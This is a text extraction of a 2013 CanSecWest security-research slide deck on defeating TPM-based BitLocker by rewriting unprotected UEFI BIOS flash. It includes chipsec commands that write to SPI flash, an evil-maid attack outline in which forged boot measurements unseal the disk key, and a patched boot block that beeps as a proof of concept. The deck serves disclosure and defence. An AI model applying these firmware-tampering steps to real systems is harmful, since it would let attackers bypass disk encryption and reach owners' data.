# Evil Maid Just Got Angrier Why Full-Disk Encryption With TPM is Insecure on Many Systems

Yuriy Bulygin (@c7zero)

CanSecWest 2013





#### **1** UEFI BIOS

◆□▶ ◆□▶ ◆臣▶ ◆臣▶ 三回 - のへで

#### **1** UEFI BIOS

2 Measured/Trusted Boot



### **1** UEFI BIOS

- 2 Measured/Trusted Boot
- 3 The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆臣▶ ◆臣▶ 臣 のへぐ

### **1** UEFI BIOS

- 2 Measured/Trusted Boot
- 3 The Real World: Bypassing Measured/Trusted Boot
- 4 Windows BitLocker with TPM



### 1 UEFI BIOS

- 2 Measured/Trusted Boot
- 3 The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆臣▶ ◆臣▶ 臣 のへぐ

- 4 Windows BitLocker with TPM
- 5 Secure Boot

### 1 UEFI BIOS

- 2 Measured/Trusted Boot
- 3 The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆臣▶ ◆臣▶ 臣 のへぐ

- 4 Windows BitLocker with TPM
- 5 Secure Boot
- 6 What Else?

### 1 UEFI BIOS

- 2 Measured/Trusted Boot
- 3 The Real World: Bypassing Measured/Trusted Boot

- 4 Windows BitLocker with TPM
- 5 Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

### 1 UEFI BIOS

- 2 Measured/Trusted Boot
- **3** The Real World: Bypassing Measured/Trusted Boot

- 4 Windows BitLocker with TPM
- **5** Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

<□> <圖> < E> < E> E のQ@

- $\blacksquare$  CPU Reset vector in ROM  $\rightarrow$  legacy boot block
- Basic CPU, chipset initialization  $\rightarrow$
- $\blacksquare$  Initialize Cache-as-RAM, load and run from cache  $\rightarrow$

- $\blacksquare$  Initialize DIMMs, create address map..  $\rightarrow$
- Enumerate PCIe devices..  $\rightarrow$
- Execute Option ROMs on expansion cards
- $\blacksquare$  Load and execute MBR  $\rightarrow$
- $\blacksquare$  2nd Stage Boot Loader / OS Loader  $\rightarrow$  OS

- $\blacksquare$  CPU Reset vector in ROM  $\rightarrow$  legacy boot block
- Basic CPU, chipset initialization  $\rightarrow$
- $\blacksquare$  Initialize Cache-as-RAM, load and run from cache  $\rightarrow$

- $\blacksquare$  Initialize DIMMs, create address map..  $\rightarrow$
- Enumerate PCIe devices..  $\rightarrow$
- Execute Option ROMs on expansion cards
- $\blacksquare$  Load and execute MBR  $\rightarrow$
- 2nd Stage Boot Loader / OS Loader  $\rightarrow$  OS
- or a Full-Disk Encryption Application

- $\blacksquare$  CPU Reset vector in ROM  $\rightarrow$  legacy boot block
- Basic CPU, chipset initialization  $\rightarrow$
- $\blacksquare$  Initialize Cache-as-RAM, load and run from cache  $\rightarrow$

- $\blacksquare$  Initialize DIMMs, create address map..  $\rightarrow$
- Enumerate PCIe devices..  $\rightarrow$
- Execute Option ROMs on expansion cards
- $\blacksquare$  Load and execute MBR  $\rightarrow$
- 2nd Stage Boot Loader / OS Loader  $\rightarrow$  OS
- or a Full-Disk Encryption Application
- or a Bootkit

### Security of Legacy BIOS

- ◆ □ ▶ → 個 ▶ → 注 ▶ → 注 → のへぐ

# Security of Legacy BIOS

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

#### Huh?

# Security of Legacy BIOS

#### Huh?

- Old architecture
- Unsigned BIOS updates by user-mode applications

- Unsigned Option ROMs
- Unprotected configuration
- SMI Handlers.. have issues [18]
- No Secure Boot

# Unified Extensible Firmware Interface (UEFI)

- $\blacksquare$  CPU reset vector in ROM  $\rightarrow$
- Startup/Security Phase (SEC)  $\rightarrow$
- $\blacksquare$  Pre-EFI Initialization (PEI) Phase (chipset/CPU initialization)  $\rightarrow$

- Driver Execution Environment (DXE) Phase ightarrow
- $\blacksquare$  OEM UEFI applications (diagnostics, update)  $\rightarrow$
- Boot Device Selection (BDS) Phase  $\rightarrow$  UEFI Boot Manager
- OS Boot Manager / Loader or Built-in UEFI Shell

- UEFI provides framework for signing UEFI binaries including native option ROMs
- Signed capsule update
- Framework for TCG measured (trusted) boot
- UEFI 2.3.1 defines secure (verified, authenticated) boot
- Protected configuration (authenticated variables, boot-time only..)
- SEC+PEI encapsulate security critical functions (recovery, TPM init, capsule update, configuration locking, SMRAM init/protection..)

UEFI specifies all needed pieces but it's largely up to platform manufacturers to use them as well as protections offered by hardware

UEFI specifies all needed pieces but it's largely up to platform manufacturers to use them as well as protections offered by hardware

What good are your signed UEFI capsules if firmware ROM is writeable by everyone?

#### 1 UEFI BIOS

- 2 Measured/Trusted Boot
- **3** The Real World: Bypassing Measured/Trusted Boot

- 4 Windows BitLocker with TPM
- **5** Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

# Measured (Trusted) Boot

#### Example: TPM Based Full-Disk Encryption Solutions

- Pre-OS firmware components are hashed (measured)
- Measurements are initiated by startup firmware (Static CRTM)
- Measurements are stored in a secure location (TPM PCRs)
- Secrets (encryption keys) are encrypted by the TPM and bounded to PCR measurements (*sealed*)

- Can only be decrypted (*unsealed*) with same PCR measurements stored in the TPM
- This chain guarantees that firmware hasn't been tampered with

### Windows BitLocker

- Encrypting the entire Windows operating system drive on the hard disk. BitLocker encrypts all user files and system files on the operating system drive, including the swap files and hibernation files.
- Checking the integrity of early boot components and boot configuration data. On computers that have a Trusted Platform Module (TPM) version 1.2, BitLocker uses the enhanced security capabilities of the TPM to help ensure that your data is accessible only if the computer's boot components appear unaltered and the encrypted disk is located in the original computer.

http://technet.microsoft.com/en-us/library/ee449438(v=ws.10).aspx

### BitLocker with Trusted Platform Module

- Volume Key used to encrypt drive contents is encrypted by the TPM based on measurements of pre-OS firmware
- If any pre-OS firmware component was tampered with, TPM wouldn't decrypt the key
- Ensures malicious BIOS/OROM/MBR doesn't log the PIN or fake recovery/PIN screen

Implementation of a Measured Boot

⊗ Initial startup FW at CPU reset vector



⊗ Initial startup FW at CPU reset vector
 PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
 べ UEFI Boot and Runtime Services, Embedded EFI OROMs

⊗ Initial startup FW at CPU reset vector

- $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS]
  - $\nwarrow$  UEFI Boot and Runtime Services, Embedded EFI OROMs

べ SMI Handlers, Static ACPI Tables

⊗ Initial startup FW at CPU reset vector

 $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS]

 $\nwarrow$  UEFI Boot and Runtime Services, Embedded EFI OROMs

 $^{\nwarrow}$  SMI Handlers, Static ACPI Tables

 $PCR[1] \leftarrow SMBIOS$ , ACPI Tables, Platform Configuration Data

⊗ Initial startup FW at CPU reset vector
 PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
 べ UEFI Boot and Runtime Services, Embedded EFI OROMs
 べ SMI Handlers, Static ACPI Tables
 PCR[1] ← SMBIOS, ACPI Tables, Platform Configuration Data
 PCR[2] ← EFI Drivers from Expansion Cards [Option ROMs]

⊗ Initial startup FW at CPU reset vector
 PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
 べ UEFI Boot and Runtime Services, Embedded EFI OROMs
 べ SMI Handlers, Static ACPI Tables
 PCR[1] ← SMBIOS, ACPI Tables, Platform Configuration Data
 PCR[2] ← EFI Drivers from Expansion Cards [Option ROMs]
 PCR[3] ← [Option ROM Data and Configuration]

◆□▶ ◆□▶ ◆目▶ ◆目▶ 目 のへぐ

⊗ Initial startup FW at CPU reset vector
 PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
 △ UEFI Boot and Runtime Services, Embedded EFI OROMs
 △ SMI Handlers, Static ACPI Tables
 PCR[1] ← SMBIOS, ACPI Tables, Platform Configuration Data
 PCR[2] ← EFI Drivers from Expansion Cards [Option ROMs]
 PCR[3] ← [Option ROM Data and Configuration]
 PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]

⊗ Initial startup FW at CPU reset vector
 PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
 △ UEFI Boot and Runtime Services, Embedded EFI OROMs
 △ SMI Handlers, Static ACPI Tables
 PCR[1] ← SMBIOS, ACPI Tables, Platform Configuration Data
 PCR[2] ← EFI Drivers from Expansion Cards [Option ROMs]
 PCR[3] ← [Option ROM Data and Configuration]
 PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]
 PCR[5] ← EFI Variables, GUID Partition Table [MBR Partition Table]

⊗ Initial startup FW at CPU reset vector
 PCR[0] ← CRTM, UEFI Firmware, PEI/DXE [BIOS]
 △ UEFI Boot and Runtime Services, Embedded EFI OROMs
 △ SMI Handlers, Static ACPI Tables
 PCR[1] ← SMBIOS, ACPI Tables, Platform Configuration Data
 PCR[2] ← EFI Drivers from Expansion Cards [Option ROMs]
 PCR[3] ← [Option ROM Data and Configuration]
 PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]
 PCR[5] ← EFI Variables, GUID Partition Table [MBR Partition Table]
 PCR[6] ← State Transitions and Wake Events

Initial startup FW at CPU reset vector  $\otimes$  $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS] べ UEFI Boot and Runtime Services, Embedded EFI OROMs べ SMI Handlers, Static ACPI Tables  $PCR[1] \leftarrow SMBIOS, ACPI Tables, Platform Configuration Data$  $PCR[2] \leftarrow EFI$  Drivers from Expansion Cards [Option ROMs]  $PCR[3] \leftarrow [Option ROM Data and Configuration]$ PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]  $PCR[5] \leftarrow EFI$  Variables, GUID Partition Table [MBR Partition Table]  $PCR[6] \leftarrow State Transitions and Wake Events$  $PCR[7] \leftarrow UEFI$  Secure Boot keys (PK/KEK) and variables (dbx..)

Initial startup FW at CPU reset vector  $\otimes$  $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS] べ UEFI Boot and Runtime Services, Embedded EFI OROMs べ SMI Handlers, Static ACPI Tables  $PCR[1] \leftarrow SMBIOS, ACPI Tables, Platform Configuration Data$  $PCR[2] \leftarrow EFI$  Drivers from Expansion Cards [Option ROMs]  $PCR[3] \leftarrow [Option ROM Data and Configuration]$ PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]  $PCR[5] \leftarrow EFI$  Variables, GUID Partition Table [MBR Partition Table]  $PCR[6] \leftarrow State Transitions and Wake Events$ PCR[7]  $\leftarrow$  UEFI Secure Boot keys (PK/KEK) and variables (dbx..) PCR[8] ← TPM Aware OS specific hashes [NTFS Boot Sector]

Initial startup FW at CPU reset vector  $\otimes$  $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS] べ UEFI Boot and Runtime Services, Embedded EFI OROMs べ SMI Handlers, Static ACPI Tables  $PCR[1] \leftarrow SMBIOS, ACPI Tables, Platform Configuration Data$  $PCR[2] \leftarrow EFI$  Drivers from Expansion Cards [Option ROMs]  $PCR[3] \leftarrow [Option ROM Data and Configuration]$ PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]  $PCR[5] \leftarrow EFI$  Variables, GUID Partition Table [MBR Partition Table]  $PCR[6] \leftarrow State Transitions and Wake Events$ PCR[7]  $\leftarrow$  UEFI Secure Boot keys (PK/KEK) and variables (dbx..) PCR[8] ← TPM Aware OS specific hashes [NTFS Boot Sector]  $PCR[9] \leftarrow TPM$  Aware OS specific hashes [NTFS Boot Block]

Initial startup FW at CPU reset vector  $\otimes$  $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS] べ UEFI Boot and Runtime Services, Embedded EFI OROMs べ SMI Handlers, Static ACPI Tables  $PCR[1] \leftarrow SMBIOS, ACPI Tables, Platform Configuration Data$  $PCR[2] \leftarrow EFI$  Drivers from Expansion Cards [Option ROMs]  $PCR[3] \leftarrow [Option ROM Data and Configuration]$ PCR[4] ← UEFI OS Loader, UEFI Applications [MBR]  $PCR[5] \leftarrow EFI$  Variables, GUID Partition Table [MBR Partition Table]  $PCR[6] \leftarrow State Transitions and Wake Events$ PCR[7]  $\leftarrow$  UEFI Secure Boot keys (PK/KEK) and variables (dbx..) PCR[8] ← TPM Aware OS specific hashes [NTFS Boot Sector]  $PCR[9] \leftarrow TPM$  Aware OS specific hashes [NTFS Boot Block]  $PCR[10] \leftarrow [Boot Manager]$ 

Initial startup FW at CPU reset vector  $\otimes$  $PCR[0] \leftarrow CRTM$ , UEFI Firmware, PEI/DXE [BIOS] べ UEFI Boot and Runtime Services, Embedded EFI OROMs べ SMI Handlers, Static ACPI Tables  $PCR[1] \leftarrow SMBIOS, ACPI Tables, Platform Configuration Data$  $PCR[2] \leftarrow EFI$  Drivers from Expansion Cards [Option ROMs]  $PCR[3] \leftarrow [Option ROM Data and Configuration]$  $PCR[4] \leftarrow UEFI OS Loader, UEFI Applications [MBR]$  $PCR[5] \leftarrow EFI$  Variables, GUID Partition Table [MBR Partition Table]  $PCR[6] \leftarrow State Transitions and Wake Events$  $PCR[7] \leftarrow UEFI$  Secure Boot keys (PK/KEK) and variables (dbx..) PCR[8] ← TPM Aware OS specific hashes [NTFS Boot Sector]  $PCR[9] \leftarrow TPM$  Aware OS specific hashes [NTFS Boot Block]  $PCR[10] \leftarrow [Boot Manager]$  $PCR[11] \leftarrow BitLocker Access Control$ 

#### Outline

#### **1** UEFI BIOS

- 2 Measured/Trusted Boot
- 3 The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

- 4 Windows BitLocker with TPM
- **5** Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

Startup UEFI BIOS firmware at reset vector is inherently trusted To initiate chain of measurements or signature verification But it's firmware and can be updated

Startup UEFI BIOS firmware at reset vector is inherently trusted

To initiate chain of measurements or signature verification

But it's firmware and can be updated

If subverted, all measurements in the chain can be forged allowing firmware modifications to go undetected

Just let BitLocker rely on all platform manufacturers

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

# Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware

#### Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates

▲□▶ ▲□▶ ▲□▶ ▲□▶ ▲□ ● ● ●

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect SPI Flash descriptor

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect SPI Flash descriptor, lock the SPI controller configuration

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect SPI Flash descriptor, lock the SPI controller configuration, and not introduce a single bug in all of this, of course.

#### Follow The Guidelines



Special Publication 800-147

▲□▶ ▲□▶ ▲□▶ ▲□▶ □ のQ@

### **BIOS Protection Guidelines**

Recommendations of the National Institute of Standards and Technology

David Cooper William Polk Andrew Regenscheid Murugiah Souppaya

- 1 Write Protection of BIOS Region in SPI Flash
- 2 Read/Write Protection via SPI Protected Range Registers
- 3 SPI Flash Region Access Control Defined in Flash Descriptor

#### Write Protecting BIOS Region in SPI Flash

#### 13.1.32 BIOS\_CNTL—BIOS Control Register (LPC I/F—D31:F0)

| Offset Address: | DCh | Attribute:  | R/WLO, R/W, RO |
|-----------------|-----|-------------|----------------|
| Default Value:  | 20h | Size:       | 8 bit          |
| Lockable:       | No  | Power Well: | Core           |

| Bit | Description                                                                                                                                                                                                                                                                                                                                                                                                                      |
|-----|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 7:6 | Reserved                                                                                                                                                                                                                                                                                                                                                                                                                         |
| 5   | SMM BIOS Write Protect Disable (SMM_BWP) – R/WLO.           This bit set defines when the BIOS region can be written by the host.           0 = BIOS region SMM protection is disabled. The BIOS Region is writable regardless if processors are in SMM or not. (Set this field to 0 for legacy behavior)           1 = BIOS region SMM protection is enabled. The BIOS Region is not writable unless all processors are in SMM. |

| 1 | BIOS Lock Enable (BLE) — R/WLO. 0 = Setting the BIOSWE will not cause SMIs. 1 = Enables setting the BIOSWE bit to cause SMIs. Once set, this bit can only be cleared by a PLTRST#                                                                                                                                                                               |
|---|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 0 | <ul> <li>BIOS Write Enable (BIOSWE) — R/W.</li> <li>0 = Only read cycles result in Firmware Hub I/F cycles.</li> <li>1 = Access to the BIOS space is enabled for both read and write cycles. When this bit is written from a 0 to a 1 and BIOS Lock Enable (BLE) is also set, an SMI# is generated. This ensures that only SMI code can update BIOS.</li> </ul> |

http://www.intel.com/content/www/us/en/chipsets/6-chipset-c200-chipset-datasheet.html

#### SPI Protected Range Registers

#### 21.1.13 PR0—Protected Range 0 Register (SPI Memory Mapped Configuration Registers)

| Memory Address: | SPIBAR + 74h | Attribute: | R/W     |
|-----------------|--------------|------------|---------|
| Default Value:  | 00000000h    | Size:      | 32 bits |

**Note:** This register can not be written when the FLOCKDN bit is set to 1.

| Bit   | Description                                                                                                                                                                                                                                                                                                        |  |  |
|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--|--|
| 31    | Write Protection Enable — R/W. When set, this bit indicates that the Base and Limit<br>fields in this register are valid and that writes and erases directed to addresses between<br>them (inclusive) must be blocked by hardware. The base and limit fields are ignored<br>when this bit is cleared.              |  |  |
| 30:29 | Reserved                                                                                                                                                                                                                                                                                                           |  |  |
| 28:16 | Protected Range Limit — R/W. This field corresponds to FLA address bits 24:12 and<br>specifies the upper limit of the protected range. Address bits 11:0 are assumed to be<br>FFFh for the limit comparison. Any address greater than the value programmed in this<br>field is unaffected by this protected range. |  |  |
| 15    | Read Protection Enable — R/W. When set, this bit indicates that the Base and Limit<br>fields in this register are valid and that read directed to addresses between them<br>(inclusive) must be blocked by hardware. The base and limit fields are ignored when<br>this bit is cleared.                            |  |  |
| 14:13 | Reserved                                                                                                                                                                                                                                                                                                           |  |  |
| 12:0  | Protected Range Base — R/W. This field corresponds to FLA address bits 24:12 and specifies the lower base of the protected range. Address bits 11:0 are assumed to be 000h for the base comparison. Any address less than the value programmed in this field is unaffected by this protected range.                |  |  |

### Welcome to the Desert of the Real (ASUS P8P67-M PRO)

|   | <b>/ISUS</b> Sys | tem Information          |
|---|------------------|--------------------------|
|   | мв               | CPU SPD                  |
|   | Motherboard      |                          |
|   | Manufacturer     | ASUSTEK COMPUTER INC.    |
|   | Product          | P8P67-M PRO              |
|   | Version          | Rev X.0x                 |
|   | Serial Number    | MT7015054001915          |
| • | BIOS             |                          |
|   | Manufacturor     | American Megatrends Inc. |
|   |                  | 04/24/2012               |
|   | Version          |                          |
|   |                  |                          |
|   |                  |                          |
|   |                  |                          |
|   |                  |                          |
|   |                  |                          |
| 4 |                  | Update System            |

◆□ > ◆□ > ◆臣 > ◆臣 > ─ 臣 ─ のへで

#### Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect SPI Flash descriptor, lock the SPI controller configuration, and not introduce a single bug in all of this, of course.

(日) (同) (三) (三) (三) (○) (○)

#### Let's Just Try to Write to UEFI BIOS, Shall We?

- - X Administrator: Command Prompt ipsec-1.0>python chipsec flash.py read 0x3FF440 0x80 ickage is not installed. No colored output ng at ٩ 2 0x40-byte chunks + 0x E f3.i e8 4d 10 Μ7 time elapsed 0.015 0x3FF440 csw.bin psec-1.0>python chipsec\_flash.py write from 'csw.bin' abled but not locked. Disabling.. = 0x3FF440 (in 8 0x4-byte chunks + 0x0-by chunk elapsed 0.000

#### Hey! We've Succeeded!



イロト イポト イヨト イヨト

э

#### I Have a Suspicion..

| 0S : Windows 7 6.1.7600 AMD64<br>Chipset: 8086<br>VID: 8100<br>DID: 0100<br>Name: Sandy Bridge (SNB)<br>Long Name: Sandy Bridge CPU / Cougar Point PCH                                                                                                                                                                         |
|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| [+] loaded common.bios_wp<br>[+] imported chipsec.modules.common.bios_wp<br>[x][ ===================================                                                                                                                                                                                                           |
| [x][ ===================================                                                                                                                                                                                                                                                                                       |
| [-] FAILED: BIOS region write protection is disabled<br>[*] BIOS Region: Base = 0x00180000, Limit = 0x003FFFFF                                                                                                                                                                                                                 |
| SPI Protected Ranges                                                                                                                                                                                                                                                                                                           |
| PRx (offset)   Value   Base   Limit   WP?   RP?                                                                                                                                                                                                                                                                                |
| PR0 (74)   00000000   00000000   00000000   0   0<br>PR1 (78)   00000000   00000000   00000000   0   0<br>PR2 (7C)   00000000   00000000   00000000   0   0<br>PR3 (80)   00000000   000000000   0   0<br>PR4 (84)   00000000   00000000   0   0   0<br>[-] FAILED: None of the SPI protected ranges write-protect BIOS region |

#### NIST BIOS Protection Guidelines Recap

#### 3.1.3 Integrity Protection

To prevent unintended or malicious modification of the system BIOS outside the authenticated BIOS update process, the RTU and the system BIOS (excluding configuration data used by the system BIOS that is stored in non-volatile memory) shall be **protected from unintended or malicious modification** with a mechanism that cannot be overridden outside of an authenticated BIOS update. The protection mechanism shall itself be protected from unauthorized modification.

The authenticated BIOS update mechanism shall be protected from unintended or malicious modification by a mechanism that is at least as strong as that protecting the RTU and the system BIOS.

The protection mechanism shall **protect relevant regions of the system flash memory containing the system BIOS** prior to executing firmware or software that can be modified without using an authenticated update mechanism or a secure local update mechanism. Protections should be enforced by hardware mechanisms that are not alterable except by an authorized mechanism.

http://csrc.nist.gov/publications/nistpubs/800-147/NIST-SP800-147-April2011.pdf

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect SPI Flash descriptor, lock the SPI controller configuration, and not introduce a single bug in all of this, of course.

#### UEFI Updates Aren't Exactly Signed Either

| ASUS Update                                                          | <u>+ ×</u>                                                                                                                                                                                |
|----------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Update BIOS from file                                                | BIOS Information                                                                                                                                                                          |
| Selected BIOS file<br>C:\prv\P8P67-M-PRO-ASUS-3602_sos.ROM<br>Browse | Current BIOS<br>Model Name<br>PBP67-M PRO<br>Version<br>3602<br>Release Date<br>04/24/2012<br>Selected BIOS<br>Model Name<br>PBP67-M PRO<br>Version<br>3602<br>Release Date<br>04/24/2012 |
| Back Next                                                            |                                                                                                                                                                                           |
| Auto<br>Tuning<br>Tool Monitor Update                                | System<br>nformation                                                                                                                                                                      |

◆□▶ ◆□▶ ◆□▶ ◆□▶ □ ● のへで

#### NIST BIOS Protection Guidelines Recap

#### 3.1.1 BIOS Update Authentication

The authenticated BIOS update mechanism employs digital signatures to ensure the authenticity of the **BIOS update image**. To update the BIOS using the authenticated BIOS update mechanism, there shall be a Root of Trust for Update (RTU) that contains a signature verification algorithm and a key store that includes the public key needed to verify the signature on the BIOS update image. The key store and the signature verification algorithm shall be stored in a protected fashion on the computer system and shall be modifiable only using an authenticated update mechanism or a secure local update mechanism as outlined in Section 3.1.2.

http://csrc.nist.gov/publications/nistpubs/800-147/NIST-SP800-147-April2011.pdf

Just let BitLocker rely on all platform manufacturers to protect the UEFI BIOS from programmable SPI writes by malware, allow only signed UEFI BIOS updates, protect authorized update software, update the boot block (SEC/PEI code) securely, correctly program and protect SPI Flash descriptor, lock the SPI controller configuration, and not introduce a single bug in all of this, of course.

#### Outline

#### **1** UEFI BIOS

- 2 Measured/Trusted Boot
- **3** The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

- 4 Windows BitLocker with TPM
- **5** Secure Boot
- 6 What Else?
- 7 Anything We Can Do?



#### Attack Outline Against Encrypted OS Drive

- 1 While the owner is not watching and system is shut down..
- 2 adversary plugs in and boots into a USB thumb drive
- 3 which auto launches exploit directly modifying UEFI BIOS in unprotected SPI Flash
- 4 Gets out until owner notices someone is messing with the system
- 5 Upon next boot, patched UEFI BIOS sends expected 'good' measurements of all pre-boot components to TPM PCRs
- **6** TPM unseals the encryption key as the measurements are correct

# Angry Evil Maid

#### Booting From Multiple OS Drives?

- System has multiple encrypted OS bootable drives (including bootable USB thumb drives)
- 2 OS is loaded while other OS drives are encrypted
- 3 Malware compromised loaded OS exploits weak BIOS protections and modifies UEFI BIOS
- When OS is booted from another encrypted drive, compromised UEFI BIOS submits expected 'good' measurements to the TPM

- 5 TPM unseals OS drive encryption key as measurements are correct
- **6** OS boots on top of compromised firmwware logging PIN

# The Original Boot Block

| _10:FFFFFABB CC             | dt                 | b OCCh | ; ;              |                                            |
|-----------------------------|--------------------|--------|------------------|--------------------------------------------|
| _10:FFFFFABC                | ;                  |        |                  |                                            |
| _10:FFFFFABC                |                    |        |                  |                                            |
| _10:FFFFFABC                | out80_Init_PCIEXB6 |        |                  | ; CODE XREF: _10:ptr_out80_Init_PCIEXBARij |
| _10:FFFFFABC B0 02          |                    |        | al, 2            |                                            |
| _10:FFFFFABE E6 80          |                    |        | 80h, al          | ; manufacture's diagnostic checkpoint      |
| _10:FFFFFAC0 BE CD FA FF FF |                    |        | esi, ØFFFFFACDh  |                                            |
| _10:FFFFFAC5 OF 6E FE       |                    |        | mm7, esi         |                                            |
| _10:FFFFFAC8 E9 97 00 00 00 | jr                 | mp     | Init_PCIEXBAR    |                                            |
| _10:FFFFFACD                | ;                  |        |                  |                                            |
| _10:FFFFFACD                |                    |        |                  |                                            |
| _10:FFFFFACD                | out80_Find_Load_Pa |        |                  |                                            |
| 10:FFFFFACD B0 07           |                    |        | al, 7            |                                            |
| _10:FFFFFACF E6 80          | 01                 |        | 80h, al          | ; manufacture's diagnostic checkpoint      |
| _10:FFFFFAD1 BE DB FA FF FF |                    |        | esi, ØFFFFFADBh  |                                            |
| _10:FFFFFAD6 0F 6E FE       |                    |        | mm7, esi         |                                            |
| _10:FFFFFAD9 EB 3D          | jr                 | mp     | short ptr_Find_L | .oad_Patch                                 |
| _10:FFFFFADB                | ,                  |        |                  |                                            |
| _10:FFFFFADB B0 08          |                    |        | al, 8            |                                            |
| _10:FFFFFADD E6 80          |                    |        | 80h, al          | ; manufacture's diagnostic checkpoint      |
| _10:FFFFFADF BE E9 FA FF FF |                    |        | esi, ØFFFFFAE9h  |                                            |
| _10:FFFFFAE4 OF 6E FE       |                    |        | mm7, esi         |                                            |
| _10:FFFFFAE7 EB 49          | jr                 | mp     | short write_MSR_ | _1AD_to_CMOS                               |
| _10:FFFFFAE9                | ;                  |        |                  |                                            |
| _10:FFFFFAE9 B0 0A          |                    |        | al, ØAh          |                                            |
| _10:FFFFFAEB E6 80          | 01                 |        |                  | ; manufacture's diagnostic checkpoint      |
| _10:FFFFFAED BE FA FA FF FF |                    |        | esi, ØFFFFFAFAh  |                                            |
| _10:FFFFFAF2 0F 6E FE       |                    |        | mm7, esi         |                                            |
| _10:FFFFFAF5 E9 BF 00 00 00 | jr                 | mp     | loc_FFFFFBB9     |                                            |
| _10:FFFFFAFA                | ;                  |        |                  |                                            |
| _10:FFFFFAFA B0 03          |                    |        | al, 3            |                                            |
| _10:FFFFFAFC E6 80          | 01                 |        | 80h, al          | ; manufacture's diagnostic checkpoint      |
| _10:FFFFAFE B0 89           | ma                 |        | al, 9            |                                            |
| _10:FFFFFB00 E6 80          | 01                 |        | 80h, al          | ; manufacture's diagnostic checkpoint      |
| _10:FFFFFB02 BE OF FB FF FF | ma                 |        | esi, ØFFFFFBØFh  |                                            |
| _10:FFFFFB07 OF 6E FE       |                    |        | mm7, esi         |                                            |
| 10:FFFFFB0A E9 B7 00 00 00  | jr                 | mp     | send_IPI_thru_Lf | PIC                                        |
| _10:FFFFB0F                 | ;                  |        |                  |                                            |
| 1A:FFFFFRAF RA AR           | mr                 | nu     | al. ARh          |                                            |
|                             |                    |        |                  |                                            |

# Now beeping SOS.. (not exactly a PIN logger)

| Hiew: P8P67-M-PRO-ASUS-3602_sos.ROM              |         |                         |
|--------------------------------------------------|---------|-------------------------|
| P8P67-M-PRO-ASUS-3602 sos.ROM                    | ☑FRO    | 32 003FF6E8 www.hiew.ru |
| 003FF6E6: 0000                                   | add     | [eax],al                |
| 003FF6E8: B0B6                                   | mov     | al,086 ;'''             |
| 003FF6EA: E643                                   | out     | 043,al ;'C'             |
| 003FF6EC: 66B8D011                               | mov     | ax,011D0 ;'ฮื่'         |
| 003FF6F0: E642                                   | out     | 042,al ;'B'             |
| 003FF6F2: 8AC4                                   | mov     | al,ah                   |
| 003FF6F4: E642                                   | out     | 042,al ;'B'             |
| 003FF6F6: BB09000000                             | mov     | ebx,9                   |
| 003FF6FB: EB07                                   | jmps    | 0003FF704E1             |
| 003FF6FD: B9FFFF0100                             | 6mov    | ecx,00001FFFF ; 🖸       |
| 003FF702: EB05                                   | jmps    | 0003FF709 22            |
